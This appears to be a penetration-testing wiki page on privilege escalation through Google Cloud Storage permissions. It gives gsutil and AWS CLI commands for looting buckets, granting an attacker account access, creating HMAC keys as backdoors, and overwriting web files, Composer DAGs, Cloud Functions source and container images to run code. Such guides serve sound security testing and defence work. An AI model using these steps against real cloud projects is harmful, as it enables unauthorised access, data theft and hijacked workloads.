GCP - Storage Privesc

Storage

Basic Information:

GCP - Storage Enum

storage.objects.get

This permission allows you to download files stored inside Cloud Storage. This can potentially let you escalate privileges because sensitive information is sometimes saved there. Moreover, some GCP services store their information in buckets:

  • GCP Composer: When you create a Composer Environment, the code of all its DAGs is saved inside a bucket. These tasks might contain interesting information in their code.

  • GCR (Container Registry): The container images are stored inside buckets, which means that if you can read the buckets you will be able to download the images and search for leaks and/or source code.
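
With only this permission (plus storage.objects.list to enumerate object names), a sketch of looting a bucket could look like this; the bucket and object names are placeholders:

# List the objects (requires storage.objects.list)
gsutil ls gs://[BUCKET_NAME]

# Download a single object
gsutil cp gs://[BUCKET_NAME]/[OBJECT] .

# Download everything recursively to search for secrets offline
gsutil -m cp -r gs://[BUCKET_NAME] ./loot/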

storage.objects.setIamPolicy

You can grant yourself permission to abuse any of the previous scenarios of this section.
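
This permission governs object ACLs, so a minimal sketch would be to grant yourself (or everyone) access over an interesting object; the principal, bucket and object names are placeholders:

# Grant a user you control read access over the object
gsutil acl ch -u attacker@example.com:R gs://[BUCKET_NAME]/[OBJECT]

# Or make the object publicly readable
gsutil acl ch -u AllUsers:R gs://[BUCKET_NAME]/[OBJECT]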

storage.buckets.setIamPolicy

For an example of how to modify permissions using this permission, check this page:

GCP - Public Buckets Privilege Escalation
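
As a quick sketch (the page above has the details), with this permission you could grant yourself a privileged role over the bucket; the principal and bucket name are placeholders:

# Grant yourself full control over the bucket
gsutil iam ch user:attacker@example.com:roles/storage.admin gs://[BUCKET_NAME]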

storage.hmacKeys.create

Cloud Storage's "interoperability" feature, designed for cross-cloud interactions such as with AWS S3, involves the creation of HMAC keys for Service Accounts and users. An attacker can exploit this by generating an HMAC key for a Service Account with elevated privileges, thus escalating privileges within Cloud Storage. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain perpetually accessible there, allowing for potential backdoor access to Storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys cannot be retrieved after creation, adding a layer of complexity for continuous access.

# Create an HMAC key for the target Service Account (prints the access key and the secret)
gsutil hmac create <sa-email>

# Configure gsutil to authenticate with it (prompts for the access key and secret)
gsutil config -a

# Use it
gsutil ls gs://[BUCKET_NAME]
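
Because HMAC keys authenticate against the S3-compatible XML API, they can also be used from the AWS CLI; a sketch assuming the aws CLI is installed and the key values come from the previous step:

# Use the HMAC key pair as AWS-style credentials
export AWS_ACCESS_KEY_ID=<hmac-access-key>
export AWS_SECRET_ACCESS_KEY=<hmac-secret>

# Access Cloud Storage through its S3-compatible endpoint
aws s3 ls --endpoint-url https://storage.googleapis.com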

Another exploit script for this method can be found here.

storage.objects.create, storage.objects.delete = Storage Write permissions

In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you also need storage.objects.delete to modify an existing object.

A very common way to exploit a bucket you can write to is when the bucket stores web server files: you might be able to upload new code that will be used by the web application.
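
A minimal sketch of that scenario; the bucket and object paths are placeholders:

# Overwrite a file served/executed by the web application
# (replacing an existing object also requires storage.objects.delete)
gsutil cp ./malicious.js gs://[BUCKET_NAME]/static/app.js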

Composer

Composer is Apache Airflow managed inside GCP. It has several interesting features:

  • It runs inside a GKE cluster, so the SA the cluster uses is accessible by the code running inside Composer

  • It stores the code in a bucket, therefore anyone with write access over that bucket will be able to change/add DAG code (the code Apache Airflow will execute). So, if you have write access over the bucket Composer uses to store the code, you can privesc to the SA running in the GKE cluster (see the sketch below).
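
A sketch of abusing this, assuming you have found the environment's bucket (Composer buckets usually look like gs://<region>-<env-name>-<random>-bucket and DAG code lives under /dags; the names below are placeholders):

# Locate the Composer bucket among the project's buckets
gsutil ls

# Upload a malicious DAG that the Airflow scheduler will pick up and execute
gsutil cp ./evil_dag.py gs://[COMPOSER_BUCKET]/dags/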

Cloud Functions

  • Cloud Functions code is stored in Storage, so by overwriting it it's possible to execute arbitrary code (see the sketch below).
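
A sketch under the assumption that the packaged source lives in a project bucket such as gs://gcf-sources-<project-number>-<region> (exact bucket and object names vary; the placeholders below are hypothetical):

# Locate the bucket holding the function source
gsutil ls | grep gcf-sources

# Download the source archive, backdoor it and upload it back
gsutil cp gs://[GCF_BUCKET]/[FUNCTION_PATH]/function-source.zip .
# ... add your payload inside the zip ...
gsutil cp ./function-source.zip gs://[GCF_BUCKET]/[FUNCTION_PATH]/function-source.zip

Note that a new deployment or execution of the function may be needed for the modified code to run.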

App Engine

  • App Engine source code is stored in buckets; by overwriting it, it could be possible to execute arbitrary code. THIS IS NOT POSSIBLE

  • It looks like container layers are stored in the bucket, maybe changing those?

GCR

  • Google Container Registry stores the images inside buckets; if you can write to those buckets you might be able to move laterally to wherever those images are being run.

    • The bucket used by GCR will have a URL similar to gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com (the top-level subdomains are specified here). See the sketch below for checking access over this bucket.
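
A sketch of checking that bucket; the project ID is a placeholder and /containers/images/ is where GCR keeps the image blobs:

# List the stored image layers/manifests
gsutil ls gs://artifacts.[PROJECT_ID].appspot.com/containers/images/

# Check whether you can write to the bucket
echo poc > /tmp/poc && gsutil cp /tmp/poc gs://artifacts.[PROJECT_ID].appspot.com/poc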
